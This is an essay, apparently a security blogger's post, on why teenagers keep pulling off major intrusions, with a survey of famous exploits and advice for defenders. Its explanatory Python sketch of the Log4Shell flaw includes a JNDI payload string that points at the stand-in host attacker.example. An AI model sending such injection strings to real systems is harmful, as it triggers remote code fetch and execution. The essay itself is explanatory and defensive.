How the Fuck Did a Teenager Do This?
There's a specific look people get when they find out who did it.
I've watched it happen to people I respect. Senior security leaders, CISOs at companies you've heard of, IR consultants billing more per hour than most people make in a week. They're sitting in a conference room or on a Webex bridge at 2am, the incident is finally contained, and the FBI agent on the line drops the detail nobody was prepared for.
He's sixteen.
The room shifts. The shoulders drop. Somebody laughs the wrong kind of laugh. The CFO who has been white-knuckling a coffee mug for three hours sets it down very, very carefully. A few of the technical folks make eye contact across the table because they already half-knew, but the executives go quiet in a way that takes them a few minutes to come out of.
Sixteen. Or seventeen. Or, in one famous case, a kid living at a Travelodge with an Amazon Fire TV stick because he was on bail and his parents had taken his computer.
The company has spent, let's say, $40 million a year on security. They have a SOC. They have an MDR contract. They have a CISO with a cyber risk program and a board-approved framework and a tabletop schedule and a tooling stack that prints SOC 2 reports the way a deli prints receipts. They have done everything the magazines told them to do. And they got dismantled by a child.
This is the part of the post where I'm supposed to act surprised on their behalf. I'm not going to.
I was that kid once. A long time ago, in a life I don't talk about much in public, I was on the other side of one of those phone calls. I won't get into specifics, partly because some of it is still nobody's business, but the shape of the experience is the same shape every generation of these kids has lived inside. I had time. I had no fear. I had nobody telling me what was supposed to be hard. I had a curiosity that didn't know it was rude to ask. And the systems I poked at, designed by adults with mortgages and meetings and quarterly objectives, simply could not survive sustained, unhurried, fearless attention from somebody who didn't know yet what he was supposed to find impossible.
That's the whole secret. It hasn't changed in thirty years. It's just gotten worse.
The story keeps repeating because the conditions keep recreating it
Pull names out of any decade and the through-line is the same.
Mitnick at sixteen. Jonathan James at fifteen, into the Defense Threat Reduction Agency and NASA. Mafiaboy at fifteen, taking down Yahoo, eBay, Amazon, CNN, and Dell in one week in 2000. The TalkTalk kid at seventeen. The Twitter Bitcoin scam in 2020 was a seventeen year old in Tampa who social-engineered his way into the internal admin tools and posted from Obama's account, from Biden's, from Musk's, from Bezos'. Lapsus$, the group that walked into Nvidia, Microsoft, Okta, Samsung, T-Mobile, Uber, and Rockstar Games over an eighteen month tear, was mostly teenagers. The lead, Arion Kurtaj, hit Rockstar with an Amazon Fire TV stick, a hotel TV, and a phone, while on bail, in a Travelodge, because the police had taken his actual computer. He stole the GTA 6 source code with a streaming dongle.
Read that again. Hotel TV. Fire stick. Phone. GTA 6 source code.
These are not the outliers. These are the canonical cases that bubble up to public reporting. For every one of them there are a hundred you'll never hear about, because the company successfully ate the story and the kid quietly went into a diversion program or got hired by a contractor.
When the same pattern keeps showing up, it stops being a coincidence and starts being a property of the system. So let's actually look at the system.
The time asymmetry is unbeatable
A senior security professional at a real company has, on a good day, maybe two hours of uninterrupted focus time. A CISO has zero. Their day is meetings, escalations, the quarterly compliance audit, the new GRC tool the CFO got sold, the board deck, the headcount fight, the vendor pitch, the phishing exercise post-mortem. They are managing. They are not, in any real sense, doing security anymore. They are doing security-adjacent administration.
A motivated fifteen year old has eight, ten, twelve hours a day. Every day. For years. With no meetings. No deliverables. No quarterly review. No standup. No interruptions except their mom asking them to come down for dinner.
This is not a small difference. This is a category difference.
Malcolm Gladwell sold a lot of books on the ten thousand hours rule. The actual research it was based on is more nuanced than the airport hardback version, but the rough idea holds: real expertise in a hard domain takes a stupid amount of unstructured, focused, exploratory time. Time spent failing. Time spent confused. Time spent on side quests that turn out to matter. Cybersecurity offense, real offense, not running a Nessus scan, is a hard domain. It rewards that kind of time the way a forge rewards heat.
Your average enterprise security engineer will not accumulate that time in their career. They are too busy doing the job. The kid will accumulate it before they finish high school.
You cannot compete with that on hours. Nobody can. I couldn't, and I'm a guy whose entire adult professional life has been in this industry. The hours I had at fifteen were better than the hours I have at forty, and there isn't a pile of money on earth that will buy them back.
The fear asymmetry is structural
Adults are afraid of the things they have. Mortgage. Career. Clearance. Family. Reputation. Children on the way. The fear isn't pathological, it's correct. Adults have built lives that can be taken from them, and the awareness of that loss shapes every risk decision they make, including the small risk of trying something that probably won't work.
Teenagers have effectively nothing to lose. The downside of failure is a parent yelling at them. The downside of getting caught, in their head, is a slap on the wrist, because they don't yet believe in the future hard enough for "five years from now, federally" to feel real.
This produces an attacker who will try things a professional simply will not try. Not because the professional doesn't know how, but because the professional has internalized a calculation about which avenues are worth exploring, and that calculation is biased toward the safe and the legible. The kid will burn six weekends on a long shot because what else was he going to do, homework? The kid will keep poking at a thing after the third "this is impossible" because he doesn't have a fourth meeting to get to.
Most of the impressive intrusions of the last decade started with somebody refusing to accept that something was impossible. That refusal is, in a strange way, a privilege of youth.
The skill tree problem
This one is going to make some people angry, but I'm going to say it anyway.
The cybersecurity industry, as it exists today, has split into two largely separate disciplines, and one of them produces almost no real attackers.
There is the developer-adjacent, deeply technical track. People who write exploits. People who reverse engineer firmware. People who do vulnerability research on browser engines and kernel drivers and bootloaders. People who build offensive tooling. People who can read assembly the way you read English. This track is small. It is geographically concentrated. It is not where most cybersecurity money is.
Then there is the compliance-adjacent, governance-and-tooling track. GRC. SOC analysts. Audit prep. Vendor management. Tool deployment. Policy writing. Risk scoring. This is where the bulk of cybersecurity headcount lives, because this is where the bulk of cybersecurity spend is. It is necessary work. I have done it, I have led teams who do it, I respect the people who do it well. But let me be very direct: a person who has spent eight years writing IR runbooks and tuning a SIEM will, on average, have no fucking idea how an actual modern exploit chain works. They will not be able to write one. They will not be able to read one. They will not be able to recognize one in flight without a vendor's IOC feed telling them what to look for.
This is not their fault. The industry hired them for something else and rewarded them for doing that something else well. But it does mean that when a sixteen year old with three years of unstructured V8 fuzzing time decides to come at their company, the defender's mental model and the attacker's mental model are not in the same universe. They are not even playing the same game.
The kid grew up on offense. He started there. He learned the systems by breaking them. He never had to unlearn the polite, sanctioned, approved-channels view of how computers work, because nobody ever taught it to him. Defense, on the other hand, often grew out of IT. It grew out of patching, hardening, tooling, response. Defense doesn't naturally teach offense. You have to deliberately go get it, on your own time, against your manager's preferences, by reading papers and writing your own crashing programs in a VM at midnight. Most people don't.
So you end up with a defender population whose deepest technical instinct is "did the tool alert" and an attacker population whose deepest technical instinct is "what does this thing do when I feed it something it didn't expect." Those are not equivalent muscles.
How the fuck: the complexity ladder
Let's talk about the exploits that make even seasoned people stop and stare.
NSO's ForcedEntry, the iMessage zero-click that Project Zero wrote up in 2021. The exploit primitive lived inside JBIG2, an image compression format from the nineties that almost nobody on earth still actively cares about, embedded in a PDF, parsed automatically by iMessage before the user ever saw the message. The researchers at NSO built a Turing-complete computational environment inside the JBIG2 stream, using the format's logical operators on its image segments as a kind of crude bytecode, and bootstrapped a script-like execution environment from inside an image parser. From there they pivoted to full code execution. Read that twice. They built a computer inside a picture, used the picture's own decoder as the CPU, and ran an exploit on the computer they built inside the picture. That's not "a clever bug." That's a soul-level commitment to a problem.
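To make "a computer inside a picture" concrete, here's a toy Python sketch. This is not JBIG2 code and these function names are my own; it just mirrors the principle from the Project Zero writeup: the format lets you combine image segments with boolean operators, and per pixel, AND plus XNOR is enough raw material to derive NAND, and NAND is enough to build everything else.

```python
# Toy illustration, not JBIG2: model a single pixel of two image
# segments being combined by the format's boolean operators.

def AND(a: int, b: int) -> int:
    return a & b

def XNOR(a: int, b: int) -> int:
    return (a ^ b) ^ 1

def NOT(a: int) -> int:
    # XNOR against an all-zero segment inverts a bit.
    return XNOR(a, 0)

def NAND(a: int, b: int) -> int:
    return NOT(AND(a, b))

# NAND is functionally complete: every other gate falls out of it,
# and from gates you get adders, registers, and eventually the
# crude "CPU" that ran inside the image decoder.
def OR(a: int, b: int) -> int:
    return NAND(NOT(a), NOT(b))

for a in (0, 1):
    for b in (0, 1):
        assert OR(a, b) == (a | b)
```

Scale that from one pixel to segments thousands of pixels wide, applied thousands of times, and you have wide boolean circuits, which is all a CPU is.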
BLASTPASS, Apple's emergency patch in 2023, was another iMessage zero-click, this one going through a heap buffer overflow in libwebp's Huffman table handling that had been quietly riding around inside Chrome, Firefox, Edge, Signal, Telegram, 1Password, basically every piece of software you own, and nobody had spotted it until somebody decided to.
Spectre and Meltdown turned the fundamental performance optimization that has made every CPU faster for twenty years into a side channel. The exploit didn't break a piece of software. It broke a piece of physics. It demonstrated that speculative execution, an entire architectural strategy, leaks data through measurable timing differences, and that you could script a website to read kernel memory. From JavaScript. Through the CPU's prediction logic.
Rowhammer flipped bits in memory by reading nearby memory cells fast enough to electrically disturb them. The exploit was, at the silicon level, a property of how DRAM is built.
Stuxnet used four zero-days at the same time, in an era when one zero-day got you a CCC talk and a book deal, and chained them together to walk through air-gapped Iranian centrifuges via USB.
Log4Shell was a logging library taking attacker-controlled input and obediently going off to fetch and execute it from an LDAP server, because somebody had built JNDI lookups into the message-formatting path and, presumably, that seemed reasonable in 2013.
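The failure mode fits in a few lines. Here's a hedged, hypothetical sketch of the anti-pattern in Python; this is not Log4j's actual code, and the `LOOKUPS` table and `log` function are invented for illustration. The point is structural: the logger itself scans every message for `${scheme:arg}` tokens and resolves them, so anyone who can get a string logged gets their token resolved.

```python
import re

# Hypothetical sketch of the Log4Shell anti-pattern: the logger
# interprets lookup expressions found anywhere in the message it
# was asked to record, including attacker-supplied substrings.
LOOKUPS = {
    "env": lambda key: f"<value of ${key}>",            # stand-in for an env lookup
    "jndi": lambda url: f"<fetched code from {url}>",   # stand-in for a remote LDAP fetch
}

def log(message: str) -> str:
    # Expand every ${scheme:arg} token before writing the log line.
    def expand(m: re.Match) -> str:
        scheme, arg = m.group(1), m.group(2)
        return LOOKUPS.get(scheme, lambda _: m.group(0))(arg)
    return re.sub(r"\$\{(\w+):([^}]*)\}", expand, message)

# Innocent call site: logging a User-Agent header verbatim.
print(log("UA=${jndi:ldap://attacker.example/x}"))
```

The innocent-looking call site is the whole vulnerability: the developer thought they were writing a string to disk, and the library decided it was evaluating a template.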
These are real exploits. Some of them came from nation states, some came from crime gangs, some came from individual researchers, and some came from kids who got obsessed enough. The line between those categories is more porous than you'd want it to be. Lapsus$ had teenagers in their group who were, in technical terms, on roughly the same skill curve as junior red team operators at major firms. The Twitter kid, the GTA 6 kid, these are not stupid people who got lucky. These are people who put thousands of hours into a craft, by themselves, before anybody was paying them.
When you look at an exploit like ForcedEntry and you don't write code for a living, your reaction is correctly "how the fuck." It's how the fuck for me too, and I do this for a living. The path from "I want to compromise an iPhone via iMessage" to "I will weaponize a decades-old image compression format to build a virtual machine inside a picture" is not a path that a mortal can describe in a meeting. It's a path that exists because somebody refused to stop. And the people most likely to refuse to stop, in this world, are the ones who haven't yet learned that some things are supposed to be impossible.
AI is the accelerant nobody wanted to admit
Here is the part nobody at a vendor booth is going to say out loud.
For a teenager who already had time and fearlessness on their side, the last two years have been a steroid injection.
Read a paper they don't fully understand? They can ask an LLM to walk them through it line by line, ask follow-ups, demand examples, request the math at a slower pace. Patch-diff a binary? They can drop the disassembly into a model and have it explain what changed and why. Want to write a fuzzer for a niche file format? They can scaffold one in an afternoon. Don't know shellcode? They can learn the shape of it in a week instead of a year. Can't afford a tutor? They have one, on demand, who will never get tired and never tell their mom.
I'm not making a value judgment about this. AI didn't invent the teenager and it didn't invent the curious kid. But it dramatically lowered the activation energy for the thing those kids were already doing. The floor has come up. The ceiling, for the obsessed ones, has come up too. A motivated sixteen year old in 2026 has access to a research apparatus that a mid-career security engineer in 2010 would have killed for, and they have eight more hours a day to use it.
If you are a defender, and your tooling and process and team have not adapted to a world where the attacker also has these capabilities, and arguably uses them more fluently than you do because they grew up native to them, you are losing time you don't know you're losing.
What this means if you're trying to defend something
I'll be honest about the shape of the answer, because I'm tired of vendors selling people a fantasy.
You are not going to out-skill the obsessed sixteen year old at offense. Not as a CISO. Not as a SOC director. Not as a senior engineer with three kids and a real life. The hours are not there. The risk tolerance is not there. The brain plasticity is, frankly, not there in the way it is at fifteen, and I say that as somebody whose brain still works fine. You are playing a different game, and you need to play it differently.
What you can actually do:
Stop pretending that compliance is security. Compliance is a floor. It is the dullest, most generous floor anyone has ever drawn. Falling through the floor is bad, but standing on the floor doesn't make you safe. It just makes you legal.
Hire people who can actually break things, and pay them. Real offensive talent is rare and expensive and worth it. One person who can read your stack the way an attacker reads your stack is worth fifteen people who can write a policy about it. If your security org has zero people who could write an exploit, you have a gap that no tool will fill, and the kid will find it.
Stop letting your detection strategy be "did the vendor's box light up." The good attacks don't light up the box. The kid at the Travelodge is not going to be in your MDR's threat feed until two months after he's already in. By then he has the source code.
Reduce your attack surface ruthlessly. Every service you expose, every integration you add, every SaaS connector you bolt on, every helpdesk number that can reset MFA over the phone, is a potential entry point that an obsessive seventeen year old is going to spend a Thursday afternoon investigating. Most companies have a hundred more entry points than they need. Cut.
Take social engineering seriously the way you take vulnerability management seriously. Lapsus$ didn't 0-day Okta. They called the helpdesk. They paid employees. They SIM-swapped people. The teenagers got better at this than your enterprise has, and you're still spending more on EDR than on training the helpdesk to refuse weird requests.
And, finally, get over the surprise. The next time the agent on the line says "he's seventeen," nobody in your incident response room should be flinching. It should be the base case. Build for that base case, not for the cinematic image of a Russian colonel in a basement somewhere who, frankly, is also probably a twenty three year old kid who used to be a sixteen year old kid.
A last thought
I'm not writing this as a celebration of the kids. Some of them have caused real harm. Some of them have hurt people, leaked things they shouldn't have leaked, destroyed careers, taken down hospitals and pipelines, made the internet worse for the rest of us. Lapsus$ wasn't cute. The Twitter kid wasn't cute. The hospital ransomware ecosystem, where the muscle is teenage affiliates working off a ransomware-as-a-service panel, isn't cute.
But the surprise that professionals keep getting, that recurring stunned silence when they find out who actually owned them, is, to me, the most dangerous part of this whole story. The surprise is the symptom. The surprise means we still, somewhere deep in the org chart, believe that real attackers look like us, think like us, have the same constraints we have. They don't. They never have. And the gap is widening every year.
I was that kid once. The kids today are better than I was, faster than I was, working with tools I would have given a kidney for. They're not the threat to fear. They're the mirror. They're showing us, every couple of years, that the systems we built are exactly as fragile as a curious teenager with no plans for the weekend says they are.
If that doesn't change how you spend your security budget, nothing will.